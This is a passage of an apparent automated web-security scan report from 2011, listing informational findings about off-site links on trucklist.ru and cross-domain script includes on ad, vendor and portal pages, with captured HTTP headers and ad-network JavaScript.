Cookie: PHPSESSID=80d1802a2bda40500b441aefe0709f80; __utmz=183052004.1303732858.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183052004.352557952.1303732858.1303732858.1303732858.1; __utmc=183052004; __utmb=183052004.2.10.1303732858

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 11:57:19 GMT
Server: Apache/2.2.4 (Unix) mod_ssl/2.2.4 OpenSSL/0.9.7h-fips PHP/5.2.1
X-Powered-By: PHP/5.2.1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 16384

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title></title>
<style type="text/css" media="sc
...[SNIP]...
</style>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.7.2/jquery-ui.min.js"></script>
...[SNIP]...
<li><a href="https://radar.protectpoint.com/usermanager/login.php" target="_blank" onmouseover="toggleme('showme','servicesdropdown');" onmouseout="toggleme('hideme','servicesdropdown');">RADAR™ customer portal</a>
...[SNIP]...
<li><a href="http://partner.protectpoint.net/" onmouseover="toggleme('showme','partnerdropdown');" onmouseout="toggleme('hideme','partnerdropdown');">PartnerVision Portal</a>
...[SNIP]...
<li><a href="http://www.thesecuritysamurai.com" onmouseover="toggleme('showme','companydropdown');" onmouseout="toggleme('hideme','companydropdown');">Security Samurai Blog</a>
...[SNIP]...

22.63. http://www.trucklist.ru/cars/trucks previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.trucklist.ru
Path:	/cars/trucks

Issue detail

The page was loaded from a URL containing a query string:

http://www.trucklist.ru/cars/trucks?utm_source=y_direct&utm_medium=cpc&utm_campaign=truck&_openstat=ZGlyZWN0LnlhbmRleC5ydTsxNzg5NDA3OzUzNzQ4MDA7eWFuZGV4LnJ1Omd1YXJhbnRlZQ

The response contains the following links to other domains:

http://counter.rambler.ru/top100.cnt?1433420
http://counter.yadro.ru/logo;trucklist?44.1
http://d1.c1.b6.a1.top.list.ru/counter?js=na;id=1446197;t=69
http://top.mail.ru/jump?from=1446197
http://top100-images.rambler.ru/top100/banner-88x31-rambler-gray2.gif
http://top100.rambler.ru/top100/
http://www.anapa.trucklist.ru/
http://www.angarsk.trucklist.ru/
http://www.arhangel-sk.trucklist.ru/
http://www.arzamas.trucklist.ru/
http://www.astrahan.trucklist.ru/
http://www.barnaul.trucklist.ru/
http://www.belarus.trucklist.ru/
http://www.belgorod.trucklist.ru/
http://www.biysk.trucklist.ru/
http://www.blagoveshchensk.trucklist.ru/
http://www.bryansk.trucklist.ru/
http://www.cheboksary.trucklist.ru/
http://www.chelyabinsk.trucklist.ru/
http://www.cherepovets.trucklist.ru/
http://www.countries.trucklist.ru/
http://www.ekaterinburg.trucklist.ru/
http://www.gelendzhik.trucklist.ru/
http://www.germany.trucklist.ru/
http://www.groznyiy.trucklist.ru/
http://www.irkutsk.trucklist.ru/
http://www.ivanovo.trucklist.ru/
http://www.izhevsk.trucklist.ru/
http://www.kaliningrad.trucklist.ru/
http://www.kaluga.trucklist.ru/
http://www.kavminvody.trucklist.ru/
http://www.kazan.trucklist.ru/
http://www.kemerovo.trucklist.ru/
http://www.khabarovsk.trucklist.ru/
http://www.kirov.trucklist.ru/
http://www.kolomna.trucklist.ru/
http://www.komsomolsk.trucklist.ru/
http://www.korea.trucklist.ru/
http://www.kostroma.trucklist.ru/
http://www.krasnodar.trucklist.ru/
http://www.krasnoyarsk.trucklist.ru/
http://www.kurgan.trucklist.ru/
http://www.kursk.trucklist.ru/
http://www.latvia.trucklist.ru/
http://www.lipetsk.trucklist.ru/
http://www.magadan.trucklist.ru/
http://www.magnitogorsk.trucklist.ru/
http://www.mahachkala.trucklist.ru/
http://www.moscow.trucklist.ru/
http://www.murmansk.trucklist.ru/
http://www.nabchelny.trucklist.ru/
http://www.nahodka.trucklist.ru/
http://www.nal-chik.trucklist.ru/
http://www.nijniy-tagil.trucklist.ru/
http://www.nizhnekamsk.trucklist.ru/
http://www.nizhniynovgorod.trucklist.ru/
http://www.noril-sk.trucklist.ru/
http://www.novokuznetsk.trucklist.ru/
http://www.novorossiysk.trucklist.ru/
http://www.novosibirsk.trucklist.ru/
http://www.noyabr-sk.trucklist.ru/
http://www.omsk.trucklist.ru/
http://www.orel.trucklist.ru/
http://www.orenburg.trucklist.ru/
http://www.penza.trucklist.ru/
http://www.perm.trucklist.ru/
http://www.petropavlovsk-kamchatskiy.trucklist.ru/
http://www.petrozavodsk.trucklist.ru/
http://www.poland.trucklist.ru/
http://www.pskov.trucklist.ru/
http://www.rostovnadonu.trucklist.ru/
http://www.ryazan.trucklist.ru/
http://www.saint-petersburg.trucklist.ru/
http://www.samara.trucklist.ru/
http://www.saransk.trucklist.ru/
http://www.saratov.trucklist.ru/
http://www.smolensk.trucklist.ru/
http://www.sochi.trucklist.ru/
http://www.stavropol.trucklist.ru/
http://www.sterlitamak.trucklist.ru/
http://www.syiktyivkar.trucklist.ru/
http://www.syz.trucklist.ru/
http://www.tambov.trucklist.ru/
http://www.tolyatti.trucklist.ru/
http://www.tomsk.trucklist.ru/
http://www.tula.trucklist.ru/
http://www.tver.trucklist.ru/
http://www.tyumen.trucklist.ru/
http://www.ufa.trucklist.ru/
http://www.ulanude.trucklist.ru/
http://www.ulyanovsk.trucklist.ru/
http://www.ussuriysk.trucklist.ru/
http://www.velnovgorod.trucklist.ru/
http://www.vladikavkaz.trucklist.ru/
http://www.vladimir.trucklist.ru/
http://www.vladivostok.trucklist.ru/
http://www.volgograd.trucklist.ru/
http://www.voljskiy.trucklist.ru/
http://www.vologda.trucklist.ru/
http://www.voronezh.trucklist.ru/
http://www.yakutsk.trucklist.ru/
http://www.yaroslavl.trucklist.ru/
http://www.yoshkarola.trucklist.ru/
http://www.yujno-sahalinsk.trucklist.ru/

Request

Response

HTTP/1.1 200 OK
Server: nginx/0.7.64
Date: Mon, 25 Apr 2011 14:37:49 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=1b167314767bdffd9a5c5c390d79c0cc; path=/; domain=trucklist.ru
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: records_per_page=30; expires=Tue, 24-Apr-2012 14:22:59 GMT; path=/; domain=.trucklist.ru
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 25 Apr 2011 14:23:12 GMT
Content-Length: 139769

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="ru">
<head>
   <meta htt
...[SNIP]...
<li><a href="http://www.moscow.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">............</a>
...[SNIP]...
<li><a href="http://www.anapa.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">..........</a>
...[SNIP]...
<li><a href="http://www.angarsk.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">............</a>
...[SNIP]...
<li><a href="http://www.arzamas.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">..............</a>
...[SNIP]...
<li><a href="http://www.arhangel-sk.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">......................</a>
...[SNIP]...
<li><a href="http://www.astrahan.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">..................</a>
...[SNIP]...
<li><a href="http://www.astrahan.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">..................</a>
...[SNIP]...
<li><a href="http://www.barnaul.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">..............</a>
...[SNIP]...
<li><a href="http://www.belgorod.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">................</a>
...[SNIP]...
<li><a href="http://www.biysk.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">..........</a>
...[SNIP]...
<li><a href="http://www.blagoveshchensk.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">........................</a>
...[SNIP]...
<li><a href="http://www.bryansk.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">............</a>
...[SNIP]...
<li><a href="http://www.velnovgorod.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">.............. ................</a>
...[SNIP]...
<li><a href="http://www.vladivostok.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">......................</a>
...[SNIP]...
<li><a href="http://www.vladikavkaz.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">......................</a>
...[SNIP]...
<li><a href="http://www.vladimir.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">................</a>
...[SNIP]...
<li><a href="http://www.volgograd.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">..................</a>
...[SNIP]...
<li><a href="http://www.voljskiy.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">................</a>
...[SNIP]...
<li><a href="http://www.vologda.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">..............</a>
...[SNIP]...
<li><a href="http://www.voronezh.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">..............</a>
...[SNIP]...
<li><a href="http://www.gelendzhik.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">..................</a>
...[SNIP]...
<li><a href="http://www.groznyiy.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">..............</a>
...[SNIP]...
<li><a href="http://www.ekaterinburg.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">........................</a>
...[SNIP]...
<li><a href="http://www.ivanovo.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">..............</a>
...[SNIP]...
<li><a href="http://www.izhevsk.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">............</a>
...[SNIP]...
<li><a href="http://www.irkutsk.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">..............</a>
...[SNIP]...
<li><a href="http://www.yoshkarola.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">............-......</a>
...[SNIP]...
<li><a href="http://www.kavminvody.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">......................</a>
...[SNIP]...
<li><a href="http://www.kazan.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">............</a>
...[SNIP]...
<li><a href="http://www.kaliningrad.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">......................</a>
...[SNIP]...
<li><a href="http://www.kaluga.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">............</a>
...[SNIP]...
<li><a href="http://www.kemerovo.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">................</a>
...[SNIP]...
<li><a href="http://www.kirov.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">..........</a>
...[SNIP]...
<li><a href="http://www.kolomna.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">..............</a>
...[SNIP]...
<li><a href="http://www.komsomolsk.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">......................-....-..........</a>
...[SNIP]...
<li><a href="http://www.kostroma.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">................</a>
...[SNIP]...
<li><a href="http://www.krasnodar.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">..................</a>
...[SNIP]...
<li><a href="http://www.krasnoyarsk.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">....................</a>
...[SNIP]...
<li><a href="http://www.kurgan.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">............</a>
...[SNIP]...
<li><a href="http://www.kursk.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">..........</a>
...[SNIP]...
<li><a href="http://www.lipetsk.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">............</a>
...[SNIP]...
<li><a href="http://www.magadan.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">..............</a>
...[SNIP]...
<li><a href="http://www.magnitogorsk.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">........................</a>
...[SNIP]...
<li><a href="http://www.mahachkala.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">..................</a>
...[SNIP]...
<li><a href="http://www.murmansk.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">................</a>
...[SNIP]...
<li><a href="http://www.nabchelny.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">.................... ..........</a>
...[SNIP]...
<li><a href="http://www.nal-chik.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">..............</a>
...[SNIP]...
<li><a href="http://www.nahodka.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">..............</a>
...[SNIP]...
<li><a href="http://www.nizhnekamsk.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">....................</a>
...[SNIP]...
<li><a href="http://www.nizhniynovgorod.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">............ ................</a>
...[SNIP]...
<li><a href="http://www.nijniy-tagil.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">............ ..........</a>
...[SNIP]...
<li><a href="http://www.novokuznetsk.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">......................</a>
...[SNIP]...
<li><a href="http://www.novorossiysk.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">........................</a>
...[SNIP]...
<li><a href="http://www.novosibirsk.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">......................</a>
...[SNIP]...
<li><a href="http://www.noril-sk.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">................</a>
...[SNIP]...
<li><a href="http://www.noyabr-sk.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">................</a>
...[SNIP]...
<li><a href="http://www.omsk.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">........</a>
...[SNIP]...
<li><a href="http://www.orel.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">........</a>
...[SNIP]...
<li><a href="http://www.orenburg.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">................</a>
...[SNIP]...
<li><a href="http://www.penza.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">..........</a>
...[SNIP]...
<li><a href="http://www.perm.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">..........</a>
...[SNIP]...
<li><a href="http://www.petrozavodsk.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">........................</a>
...[SNIP]...
<li><a href="http://www.petropavlovsk-kamchatskiy.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">..........................-....................</a>
...[SNIP]...
<li><a href="http://www.pskov.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">..........</a>
...[SNIP]...
<li><a href="http://www.rostovnadonu.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">............-....-........</a>
...[SNIP]...
<li><a href="http://www.ryazan.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">............</a>
...[SNIP]...
<li><a href="http://www.samara.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">............</a>
...[SNIP]...
<li><a href="http://www.saint-petersburg.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">..........-..................</a>
...[SNIP]...
<li><a href="http://www.saransk.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">..............</a>
...[SNIP]...
<li><a href="http://www.saratov.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">..............</a>
...[SNIP]...
<li><a href="http://www.smolensk.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">................</a>
...[SNIP]...
<li><a href="http://www.sochi.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">........</a>
...[SNIP]...
<li><a href="http://www.stavropol.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">....................</a>
...[SNIP]...
<li><a href="http://www.sterlitamak.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">......................</a>
...[SNIP]...
<li><a href="http://www.syz.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">..............</a>
...[SNIP]...
<li><a href="http://www.syiktyivkar.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">..................</a>
...[SNIP]...
<li><a href="http://www.tambov.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">............</a>
...[SNIP]...
<li><a href="http://www.tver.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">..........</a>
...[SNIP]...
<li><a href="http://www.tolyatti.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">................</a>
...[SNIP]...
<li><a href="http://www.tomsk.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">..........</a>
...[SNIP]...
<li><a href="http://www.tula.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">........</a>
...[SNIP]...
<li><a href="http://www.tyumen.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">............</a>
...[SNIP]...
<li><a href="http://www.ulanude.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">........-......</a>
...[SNIP]...
<li><a href="http://www.ulyanovsk.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">..................</a>
...[SNIP]...
<li><a href="http://www.ussuriysk.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">..................</a>
...[SNIP]...
<li><a href="http://www.ufa.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">......</a>
...[SNIP]...
<li><a href="http://www.khabarovsk.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">..................</a>
...[SNIP]...
<li><a href="http://www.cheboksary.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">..................</a>
...[SNIP]...
<li><a href="http://www.chelyabinsk.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">..................</a>
...[SNIP]...
<li><a href="http://www.cherepovets.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">..................</a>
...[SNIP]...
<li><a href="http://www.yujno-sahalinsk.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">........-..................</a>
...[SNIP]...
<li><a href="http://www.yakutsk.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">............</a>
...[SNIP]...
<li><a href="http://www.yaroslavl.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">..................</a>
...[SNIP]...
<li><a href="http://www.countries.trucklist.ru/" onclick="set_current_region(this, 'country'); return false;">...... ............</a>
...[SNIP]...
<li><a href="http://www.belarus.trucklist.ru/" onclick="set_current_region(this, 'country'); return false;">................</a>
...[SNIP]...
<li><a href="http://www.germany.trucklist.ru/" onclick="set_current_region(this, 'country'); return false;">................</a>
...[SNIP]...
<li><a href="http://www.korea.trucklist.ru/" onclick="set_current_region(this, 'country'); return false;">..........</a>
...[SNIP]...
<li><a href="http://www.latvia.trucklist.ru/" onclick="set_current_region(this, 'country'); return false;">............</a>
...[SNIP]...
<li><a href="http://www.Poland.trucklist.ru/" onclick="set_current_region(this, 'country'); return false;">............</a>
...[SNIP]...
<a href="http://www.liveinternet.ru/click;trucklist"
target="_blank" rel="nofollow"><img src="http://counter.yadro.ru/logo;trucklist?44.1"
title="LiveInternet"
alt="" border="0" width="31" height="31"/></a>
...[SNIP]...
<noscript><a
                       rel="nofollow"

                       target="_top" href="http://top.mail.ru/jump?from=1446197"><img

                       src="http://d1.c1.b6.a1.top.list.ru/counter?js=na;id=1446197;t=69"

                       border="0" height="31" width="38"

                       alt="..............@Mail.ru"/></a>
...[SNIP]...


                       <a rel="nofollow" href="http://top100.rambler.ru/top100/"><img src="http://counter.rambler.ru/top100.cnt?1433420" alt="" width="1" height="1" border="0" /></a>
...[SNIP]...


                       <a rel="nofollow" href="http://top100.rambler.ru/top100/"><img src="http://top100-images.rambler.ru/top100/banner-88x31-rambler-gray2.gif" alt="Rambler's Top100" width="88" height="31" border="0" /></a>
...[SNIP]...

23. Cross-domain script include previous next
There are 78 instances of this issue:

http://ad.amgdgt.com/ads/
http://ad.amgdgt.com/ads/
http://auto.webalta.ru/
https://checkout.netsuite.com/s.nl
https://checkout.netsuite.com/s.nl/c.438708/n.1/sc.4/.f
http://direct.yandex.ru/
http://forums.manageengine.com/fbw
http://games.webalta.ru/
http://goods.adnectar.com/static/quantcast_1.html
http://googleads.g.doubleclick.net/pagead/ads
http://googleads.g.doubleclick.net/pagead/ads
http://googleads.g.doubleclick.net/pagead/ads
http://ideco-software.ru/products/ims/
http://learn.shavlik.com/
http://learn.shavlik.com/shavlik/N
http://learn.shavlik.com/shavlik/a
http://mail.ru/
http://nguard.com/about.aspx
http://nguard.com/contact.aspx
http://nguard.com/vulnerability-assessment/
http://odnoklassniki.ru/
http://pda.loveplanet.ru/
http://pixel.fetchback.com/serve/fb/pdc
http://pogoda.webalta.ru/
http://pretty.ru/
http://shopping.netsuite.com/s.nl
http://solutions.kronos.com/forms/experience2011
https://store.manageengine.com/service-desk/index.html
http://tengrinews.kz/tag/891/
http://webalta.ru/
http://webalta.ru/news.html
https://www.controlscan.com/
https://www.controlscan.com/checkout.php
https://www.controlscan.com/checkout_invalid.php
https://www.controlscan.com/pcicompliance.php
https://www.controlscan.com/shoppingcart.php
http://www.criticalwatch.com/company/critical-watch-career.aspx
http://www.criticalwatch.com/company/critical-watch-contact.aspx
http://www.criticalwatch.com/company/critical-watch-security.aspx
http://www.criticalwatch.com/company/management.aspx
http://www.criticalwatch.com/products/mssp.aspx
http://www.criticalwatch.com/products/vulnerability-management-ips.aspx
http://www.criticalwatch.com/products/vulnerability-management-overview.aspx
http://www.criticalwatch.com/solutions/vulnerability-management.aspx
http://www.criticalwatch.com/support/critical-watch-resource-library.aspx
http://www.criticalwatch.com/support/critical-watch-support.aspx
http://www.criticalwatch.com/support/fusionvm-technical-faq.aspx
http://www.criticalwatch.com/vulnerability-management.aspx
http://www.criticalwatch.com/vulnerability-scan-trial.aspx
http://www.eset.com/us/
http://www.eset.com/us/business/products
http://www.eset.com/us/business/server-security/linux-file
http://www.eset.com/us/home/smart-security
http://www.eset.com/us/store
http://www.eset.com/us/styles/store-new.css
http://www.facebook.com/plugins/like.php
http://www.iveco-ptc.spb.ru/
http://www.iveco-ptc.spb.ru/favicon.ico
http://www.kronos.com/about/about-kronos.aspx
http://www.livejournal.com/
http://www.manageengine.com/me_partners.html
http://www.manageengine.com/products/applications_manager/application-performance-management.html
http://www.manageengine.com/products/security-manager/
http://www.manageengine.com/products/security-manager/download.html
http://www.manageengine.com/products/security-manager/store.html
https://www.manageengine.com/network-performance-management.html
https://www.manageengine.com/products/security-manager/index.html
http://www.marketgid.com/pnews/773204/i/7269/pp/2/1/
http://www.netsuite.com/portal/products/ecommerce/website-hosting.shtml
http://www.outpost24.com/
http://www.outpost24.com/products.html
http://www.stillsecure.com/company/testimonials.php
http://www.stillsecure.com/library/
http://www.stillsecure.com/m/
http://www.stillsecure.com/products.php
http://www.stillsecure.com/services/index.php
http://www.stillsecure.com/vam/
http://www.tresware.com/Static-contact.html

23.1. http://ad.amgdgt.com/ads/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.amgdgt.com
Path:	/ads/

Issue detail

The response dynamically includes the following scripts from other domains:

http://servedby.adxpose.com/adxpose/find_ad.js
http://view.atdmt.com/TLC/jview/253732017/direct/01/rnd=1043494379?click=http://ad.amgdgt.com/ads/t=c/s=AAAAAQAUlNedbcTg0PaihQfN8uf83YXzbLhnZW8sdXNhLHQsMTMwMzc0MTI0OTEwMCxjLDI4OTY2OSxwYyw2OTExMixhYywxNjYzMDgsbyxOMC1TMCxsLDU1MzY1LHBjbGljayxodHRwOi8vaWIuYWRueHMuY29tL2NsaWNrL0FBQUFBQUFBRkVBQUFBQUFBQUFVUUFBQUFNRE16QUJBNFhvVXJrZmhGRURoZWhTdVItRVVRSUNVOEZFbUMxWjhTc1lkYTZiMnppVS1nN1ZOQUFBQUFJQWVBUUMxQUFBQWxnSUFBQUlBQUFESHBBSUEwV01BQUFFQUFBQlZVMFFBVlZORUFDd0ItZ0EzQ1JRRTRnZ0JBZ1VDQUFNQUFBQUFreHpXVndBQUFBQS4vY25kPSF3QV9IdHdqYzh3SVF4OGtLR0FBZzBjY0JLSlFJTVFBQUFMeEg0UlJBUWdvSUFCQUFHQUFnQVNnQlFnc0luMFlRQUJnQUlBTW9BVUlMQ0o5R0VBQVlBQ0FDS0FGSUFWQUFXTGNTWUFCb2xnVS4vcmVmZXJyZXI9aHR0cDovL3d3dy5saXZlam91cm5hbC5jb20vL2NsaWNrZW5jPWh0dHA6Ly9hZGNsaWNrLmcuZG91YmxlY2xpY2submV0L2FjbGs_c2E9bCZhaT1CSlNqQlBvTzFUWnZUQ0pEdmxRZnF2Tnp5QjlmcS1OTUJsNkdVN0JpWG42ZXpJUUFRQVJnQklBQTRBVkNBeC1IRUJHREo3b09JOEtQc0VvSUJGMk5oTFhCMVlpMDBORFUyTVRneU1UTTFPVFUyT1RjMG9BSEQ4djNzQTdJQkUzZDNkeTVzYVhabGFtOTFjbTVoYkM1amIyMjZBUW96TURCNE1qVXdYMkZ6eUFFSjJnRWJhSFIwY0RvdkwzZDNkeTVzYVhabGFtOTFjbTVoYkM1amIyMHZtQUtJSjhBQ0JNZ0NoZExQQ3VBQ0FPb0NHalUyTlRVdmJHb3VhRzl0WlhCaFoyVXZiRzluWjJWa2IzVjBxQU1CNkFQNEFfVURDQUNBaE9BRUFZQUc2Y1NGOU1XUTFva3kmbnVtPTEmc2lnPUFHaVdxdHhtcThuVzNDR2ZKOFJRbmVtOVZlLUduNlBzX2cmY2xpZW50PWNhLXB1Yi00NDU2MTgyMTM1OTU2OTc0JmFkdXJsPQo-/clkurl=
http://view.c3metrics.com/v.js?id=adcon&cid=480&t=72

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: UA=AAAAAQAUxOdW3WQldyr.xNlqt1dY_m2yKF0DA3gBY2BgEGFg6lzCwJLdysDI.4OB4YYrAwMDJwMDo34vxzZvqFwLUO4nUM4NIefSj0uuIzvmFE65JLfrOOUivK7hlPObEIJTzrWBAyrXBnTnd6A7XWDu7JBwv41Tn4SdNi597Sd3bsKlr_3kjFqccieEF.OUO7bgEU65o18FccrNWMCOW862Fafc9IeeuOU6VuKWM9XFKTftpiIwbBlxyld2CwHlGXy37Gxg4AAmpJ2MjIwMDIG3GJmBFIMBE4MIiK9gBhZeWgAWZslkZAMKsoQwsTGyAxnyu5gYuEHKwGnQB2QeAwMAUdqQwA--; Domain=.amgdgt.com; Expires=Wed, 25-May-2011 14:20:49 GMT; Path=/
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache, no-store
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/javascript;charset=UTF-8
Content-Length: 3919
Date: Mon, 25 Apr 2011 14:20:48 GMT

_289669_amg_acamp_id=166308;
_289669_amg_pcamp_id=69112;
_289669_amg_location_id=55365;
_289669_amg_creative_id=289669;
_289669_amg_loaded=true;
var _amg_289669_content='<script type="text/javascript"
...[SNIP]...
</script> <script src="http://servedby.adxpose.com/adxpose/find_ad.js" type="text/javascript" charset="utf-8"></script>\n'+
'\n'+
'<script language="JavaScript" type="text/javascript" src="http://view.atdmt.com/TLC/jview/253732017/direct/01/rnd=1043494379?click=http://ad.amgdgt.com/ads/t=c/s=AAAAAQAUlNedbcTg0PaihQfN8uf83YXzbLhnZW8sdXNhLHQsMTMwMzc0MTI0OTEwMCxjLDI4OTY2OSxwYyw2OTExMixhYywxNjYzMDgsbyxOMC1TMCxsLDU1MzY1LHBjbGljayxodHRwOi8vaWIuYWRueHMuY29tL2NsaWNrL0FBQUFBQUFBRkVBQUFBQUFBQUFVUUFBQUFNRE16QUJBNFhvVXJrZmhGRURoZWhTdVItRVVRSUNVOEZFbUMxWjhTc1lkYTZiMnppVS1nN1ZOQUFBQUFJQWVBUUMxQUFBQWxnSUFBQUlBQUFESHBBSUEwV01BQUFFQUFBQlZVMFFBVlZORUFDd0ItZ0EzQ1JRRTRnZ0JBZ1VDQUFNQUFBQUFreHpXVndBQUFBQS4vY25kPSF3QV9IdHdqYzh3SVF4OGtLR0FBZzBjY0JLSlFJTVFBQUFMeEg0UlJBUWdvSUFCQUFHQUFnQVNnQlFnc0luMFlRQUJnQUlBTW9BVUlMQ0o5R0VBQVlBQ0FDS0FGSUFWQUFXTGNTWUFCb2xnVS4vcmVmZXJyZXI9aHR0cDovL3d3dy5saXZlam91cm5hbC5jb20vL2NsaWNrZW5jPWh0dHA6Ly9hZGNsaWNrLmcuZG91YmxlY2xpY2submV0L2FjbGs_c2E9bCZhaT1CSlNqQlBvTzFUWnZUQ0pEdmxRZnF2Tnp5QjlmcS1OTUJsNkdVN0JpWG42ZXpJUUFRQVJnQklBQTRBVkNBeC1IRUJHREo3b09JOEtQc0VvSUJGMk5oTFhCMVlpMDBORFUyTVRneU1UTTFPVFUyT1RjMG9BSEQ4djNzQTdJQkUzZDNkeTVzYVhabGFtOTFjbTVoYkM1amIyMjZBUW96TURCNE1qVXdYMkZ6eUFFSjJnRWJhSFIwY0RvdkwzZDNkeTVzYVhabGFtOTFjbTVoYkM1amIyMHZtQUtJSjhBQ0JNZ0NoZExQQ3VBQ0FPb0NHalUyTlRVdmJHb3VhRzl0WlhCaFoyVXZiRzluWjJWa2IzVjBxQU1CNkFQNEFfVURDQUNBaE9BRUFZQUc2Y1NGOU1XUTFva3kmbnVtPTEmc2lnPUFHaVdxdHht